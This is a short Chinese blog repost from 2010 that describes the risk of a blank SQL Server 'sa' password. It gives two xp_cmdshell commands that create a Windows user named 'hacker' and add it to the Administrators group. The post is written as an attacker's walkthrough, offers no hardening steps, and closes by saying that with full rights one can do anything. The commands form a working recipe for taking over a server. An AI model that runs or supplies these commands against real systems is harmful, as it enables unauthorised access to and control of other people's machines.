2010/04/08

SQL Server权限划分不当的危害 [转]

在新安装的SQL Server后,如果"sa"帐户,密码就为空,而且这个密码是SQL Server安全模块成员,享有最高的管理控制权,那么我们就可以用查询器或者OSQL登陆到对方的计算机上,前提是对方的数据库中xp_cmdshell stored procedure“扩展存储过程” 存在,默认是有的,(能让你这么容易的登陆上估计也不可能删除的)然后运行下面的命令:

Xp_cmdshell "net user hacker 123456 /ADD" 
(增加一个名字为hacker密码为123456的用户) 
然后在: 
Xp_cmdshell "net localgroup Administrators hacker /ADD" 
(给刚才增加的hacker用户,添加到Administrators组中)

这样攻击者就成功的在SQL SERVER上增加了一个windows用户,而且有最高权限,

然后做什么呢?这个问题自己想吧,有了最高权限,想做什么就做什么吧。

没有评论: